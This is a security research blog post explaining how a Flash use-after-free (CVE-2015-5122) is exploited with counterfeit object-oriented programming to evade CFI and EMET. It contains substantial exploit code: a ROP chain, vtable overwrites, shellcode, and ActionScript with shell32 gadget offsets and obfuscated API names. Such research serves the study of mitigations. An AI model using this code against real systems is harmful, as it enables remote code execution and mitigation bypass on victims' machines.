DATE HERE
By Perception Point Research Team

Breaking CFI:
Exploiting CVE-2015-5122 using COOP

DATE HERE
By Perception Point Research Team

CVE-2015-5122 is a use-after-free vulnerability that was used by Hacking Team to exploit Adobe Flash Player (version 18.0.0.203 and below). In this post we’re going to focus on exploitation and not on the vulnerability, it’s important to note that by leveraging the vulnerability we are able to gain a full read-write primitive to the process memory.

An analysis of the bug itself can be found here

Metasploit’s Exploitation

We based our work on Metasploit’s exploit of CVE-2015-5122. You can find the ActionScript source code here
In order to achieve a read/write primitive, the bug is used to overwrite the length member of a vector object. The vector object is wrapped with the ExploitBytheArray class that contains the write(addr, data) and read(addr) methods that provide the full read/write primitive.

First, the code sprays a vector containing a stack-pivot stub

private function spray_objects():void
{
    Logger. log( "[*] Exploiter - spray_objects()" )
               
    // mov eax, [ esp+0x4 ]
    // xchg eax,esp
    // rets
    stub [ 0 ] = 0x0424448B
    stub [ 1 ] = 0x0000C394
               
    for ( var i:uint = 0; i < spray.length; i++ )
    {
...
    }

As you can see in Exploiter.as, the code uses the ExploitByteArray object (eba) to write the ROP-chain and shellcode to the memory:

// Put the payload (command) in memory
eba.write(payload_address + 8, payload, true); // payload

// Put the fake stack in memory
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; address will become stack after stack pivot
eba.write(0, virtualprotect)

// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)

// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE

// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7f6e0000)
eba.write(0, payload_address + 8)
eba.write(0, payload.length)

// CreateThread
eba.write(0, createthread)
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7f6e0000)
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
 

Code execution is gained by defining a fake “magic” method in the Exploiter class, its vtable offset is overridden by using the ExploitByteArray. The overridden vtable entry will point to a gadget controlled by the attacker and invoked when the “magic” method is called.
Looking at the metasploit implementation, the attacker first calls VirtualProtect in order to change the sprayed stack-pivot stub’s page protection to PAGE_EXECUTE, and then uses the magic method a second time to call the executable stub and start the ROP chain:

// VirtualProtect the stub with a *reliable* stack pivot
eba.write(stack_address + 8 + 0x80 + 28, virtualprotect)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stub_address)
eba.write(magic + 0x20, 0x10)
var args:Array = new Array(0x41)
Magic.call.apply(null, args);

// Call to our stack pivot and init the rop chain
eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8)
eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored)
eba.write(magic + 0x1c, stack_address + 0x18000)
Magic.call.apply(null, null);
eba.write(magic_object, magic_table);
eba.write(magic + 0x1c, magic_arg0)
eba.write(magic + 0x20, magic_arg1)
 

Magic method’s vtable offset is 28 (0x1c).
First, the attacker writes VirtualProtect’s address to the 0x1c offset of a fake vtable, then overwrite the object’s vptr to point to the fake vtable.

This implementation is enough to exploit the vulnerability and bypass ASLR and DEP, but it’s far from being undetectable by modern CFI implementations. For example, Shadow Stack based CFI implementations will easily detect the stack pivot and the ROP chain execution as they will observe that the magic function returns to a different address than the address that was pushed on the stack by the original call instruction.
Additionally,EMET’s “caller mitigation” algorithm detects the second VirtualProtect invocation from the ROP chain, because it disassembles the return address instructions of “critical functions” and validates that there’s a CALL instruction there (and not a RET instruction).
Also, before the ROP stage, some fine-grained CFI solutions will detect the first VirtualProtect invocation because it is performed by an unfamiliar CALL instruction.

To summarize, in order to make this exploit undetectable by modern CFI implementations, we must conform to the following constraints:

  1.   We must not violate the stack pointer or change any return-address on the stack
  2.   We must use the Magic method to invoke only legal functions. Which means no ROP style gadgets because their addresses point to the middle of a function and that is detectable by CFI solutions.
  3.   We must not use the Magic function to call to critical functions like VirtualProtect, VirtualAlloc, etc..

In order to implement the exploit under these constraints we need to use COOP (Counterfeit Object-oriented Programming).

COOP

Counterfeit Object-Oriented Programming (COOP) is a new code-reuse technique for C++ applications. This technique relies on the assumption that CFI solutions do not consider C++ semantics, as they don’t check that every virtual function is called by the appropriate virtual callsite. By creating a counterfeit object with a fake vtable with vptr’s of our choosing, we can invoke any virtual function without triggering CFI. This is because CFI solutions don’t validate that the called virtual-function has any connection to the caller object’s class.

First, we need to find virtual functions that perform the operations we plan to do. These functions are called “vfgadgets”.
Second, in order to combine them all together we need to find a special vfgadget called Main Loop Gadget (ML-G or ML-ARG-G if it is passed arguments). This vfgadget contains a loop that iterates through a list of objects and calls a virtual function for each one of them. It’s common to find such a vfgadget in a large C++ application. By filling the counterfeit ML-G object with a fake member list of objects, each object will hold a fake vtable containing a different vfgadget, we can execute different parts of the application’s code without violating the constraints described above.

More information about COOP can be found in this paper.

There are several ways to implement this exploit using the COOP technique. For example, we can search vfgadgets in our C++ application that give us the ability to write a file to the disk and then another vfgadget that gives us the ability to execute it by CreateProcess, or LoadLibrary.
Another way is to mark a page in the memory with EXECUTABLE and WRITE permissions by finding a vfgadget that calls VirtualProtect or VirtualAlloc, and then we can use this page to write our shellcode to and execute it.

In our implementation, we chose the second way, because we found a very simple vfgadget that creates a page with EXECUTE_READWRITE permissions. However, during the research we also found 5 vfgadgets in flash DLL that do the following:

  1.   Create 2 directories, under any path we want to (necessary for the next vfgadget)
  2.   Write a file to a path under the name “digest.s”.
  3.   Call MoveFileEx API as we have a full control on the source and destination parameters. This will rename the file “digest.s” to “atl.dll” which is necessary for the final vfgadget.
  4.   Call SetCurrentDirectory API with a controllable path parameter. We can use it to set the process’s current directory to the path containing our payload file.
  5.   Call LoadLibrary to “atl.dll” which will load our payload dll.

Anyhow, combining all these vfgadgets together is possible but very complicated, and as mentioned before, we found one simple vfgadget that gives us a memory page with READWRITE_EXECUTE protection.
This vfgadget is ATL::CComControl::CreateControlWindow, a virtual function we found in shell32.dll (Window 7 SP1 32bit).

ATL::CComControl::CreateControlWindow

Active Template Library(ATL) is a C++ template library that is used to simplify the programming of COM object in Windows. You can find these templates in some of Windows libraries, including shell32.dll.
One of shell32.dll objects is CComControl, a class that provides methods for creating and managing ATL controls.
The important method for us is CreateControlWindow.

According to microsoft’s documentation, this is what this method actually does:

By default, creates a window for the control by calling CWindowImpl::Create.

Syntax

virtual HWND CreateControlWindow(
    HWND hWndParent,
    RECT& rcPos
);

Parameters

hWndParent
[in] Handle to the parent or owner window. A valid window handle must be supplied. The control window is confined to the area of its parent window.

rcPos
[in] The initial size and position of the window to be created.

Remarks

Override this method if you want to do something other than create a single window, for example, to create two windows, one of which becomes a toolbar for your control.

This method actually initializes and creates a window. As every window, it needs to have a WndProc function – a callback function that will process all the messages that will be sent to the window.
We found out that this function puts a thunk as the WndProc procedure of the window. This thunk transforms the Windows C callback call into a virtual function call, by overwriting the first WndProc stack argument (that’s supposed to be the HANDLE of the window) with a C++ this pointer.

The thunk data and its disassembly:

Thunk data:
c7 44 24 04 [DWORD thisPointer] e9 [DWORD WndProc]

disas:
mov DWORD PTR [esp+0x4], thisPointer
jmp WndProc
 

More information about the ATLThunk can be found here
Note: This method is relevant to Windows 7 as mentioned here, and is supposed to be changed in a later ATL version.

What’s really interesting in our vfgadget implementation is that the thunk is written to a page that is allocated by VirtualAlloc with EXECUTE_READWRITE permissions. This VirtualAlloc call is performed by ATL::_stdcallthunk::Init as you can see in the following screenshot (0x40 is the flProtect parameter, meaning EXECUTE_READWRITE):

The only things that actually matters to us are:

To summarize, we will create our counterfeit CComControl object, call the ATL::CComControl::CreateControlWindow vfgadget, and then use our read/write primitive (ExploitByteArray) to read the created thunk address. Ultimately giving us a READWRITE_EXECUTE page to store our shellcode.
Well, almost, the Magic method we use in order to execute the vfgadget passes 3 arguments to virtual function, however ATL:CComControl::CreateControlWindow receives only 2 arguments which leads to a stack corruption and crashes the process. In order to avoid a stack corruption we use another vfgadget that receives 3 arguments and use it to call ATL::CComControl::CreateControlWindow.

ML-ARG-G vfgadget

To find such a vfgadget we searched shell32.dll’s functions with an IDA script with the following constraints:

  1. It’s a virtual function (it is xref in a vtable)
  2. It has one indirect call that involves registers
  3. It receives 3 arguments like our Magic method (detected by “retn X” opcode)
  4. It passes 2 arguments to the indirect called function (detected by subtracting the pops count from the pushes count)
  5. It’s smaller than 0x30 bytes – after all, we don’t want a long and complex vfgadget.

We looked over the script result and chose the ultimate one: CLibrariesFolderBase::v_AreAllLibraries
This vfgadget is actually a mainloop gadget (ML-ARG-G) that calls the same virtual function (offset 0x4c of the VTABLE) in every iteration and stops the iteration only when the function returns a successful error code (0).

The shellcode

We created a simple shellcode that executes calc.exe and terminate the process. It gets CreateProcessA and ExitProcess addresses as a parameters (assumes they written in the memory right after the shellcode).

[BITS 32]

mov esp, ebp;
call $+5;
pop ebp;
sub ebp, 0x7;
xor ebx, ebx;
lea ecx, [ebp + process_info];
push ecx;
lea ecx, [ebp + startup_info];
push ecx;
push ebx;
push ebx;
push ebx;
push ebx;
push ebx;
push ebx;
lea ecx, [ebp + calc_wstr];
push ecx;
push ebx;
lea eax, [ebp + eof];
add eax, 2;
call [eax]; ; kernel32!CreateProcessW
lea eax, [ebp + eof];        
add eax, 6;
call [eax]; ; kernel32!ExitProcess
db 0xcc;

calc_wstr: db "c", 0, "a", 0, "l", 0, "c", 0, ".", 0, "e", 0, "x", 0, "e", 0, 0;
padding: db 0x0, 0x0 ,0x0;
startup_info: db 0x44, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00;
process_info: db 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00;
eof: db 0x00, 0x00;
 

In order to bypass EMET’s EAF protection, we improved metasploit implementation of PE.as library, and added a simple method that parses PE import table and returns the address of the imported procedure you want to use.

Combining it all together

Now to finish our exploit implementation we combine all the steps together in the exploit.as
First, we setup all the addresses relevant for our exploit, including the 2 vfgadgets and ExitProcess and CreateProcessW pointers:

var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var shell32:uint = pe.module("sh4ell32.dll".replace("4", ""), flash)
var ml_arg_g:uint = shell32 +0x2db3d6
var createWindow_g:uint = shell32 + 0x353e36
var original_this:uint = 0

// get ExitProcess and CreateProcessW procedures from import table to bypass EMET EAF
var exitProcess:uint = pe.get_import_table_procedure("KERNEL32.dll", "E2xitProcess".replace("2", ""), flash)
var createProcess:uint = pe.get_import_table_procedure("KERNEL32.dll", "Creat2eProcessW".replace("2", ""), flash)
 

Now, let’s build our counterfeit objects, as the magic method pointer [vtable+0x18] will point to our ML-ARG-G, and the ML-ARG-G inner call vtable’s offset [vtable+0x4c] will point to CreateControlWindow vfgadget:

// first, we save the current this pointer, to recover it later
original_this = eba.read(magic_object);

var magic_vtable:uint = magic_object+0x40;

// now, lets put a fake vptr at [magic_object]
eba.write(magic_object, magic_vtable);

// [vtable+0x18] will hold the first vfgadget that will be invoked
// it will be the ML-ARG-G we found in shell32.
eba.write(magic_vtable + 0x18, ml_arg_g);

// [vtable+0x4c] will hold the second vfgadget that will be invoked
// It will be the createWindow vfgadget we found in shell32
eba.write(magic_vtable+0x4C, createWindow_g)
 

Now, invoking the Magic method will perform our COOP flow:

eba.write(magic + 0x1c, 0x0)
eba.write(magic + 0x20, magic_object+0x100)
var args:Array = new Array(0x41)
Magic.call.apply(null, args);
eba.write(magic_object, original_this);
 

When our COOP flow finished, we can read the created READWRITE_EXECUTE allocated page pointer. It will be stored at 0x5c offset from the “this”:

// createWindow allocated a page with EXECUTE_READWRITE protection, and stored a pointer to it on magic_object+5C
var allocated_address:uint = eba.read(magic_object+0x5c)

// get page base address
allocated_address = allocated_address&0xFFFFF000
 

Now, we can simply write our compiled shellcode to the allocated_address, put this address in Magic vtable offset, and call the magic method again.

Share the joy

More Articles

Analysis and exploitation of a Linux kernel vulnerability (CVE-2016-0728)

The Perception Point Research team has identified a 0-day local privilege escalation vulnerability in the Linux kernel.
Read More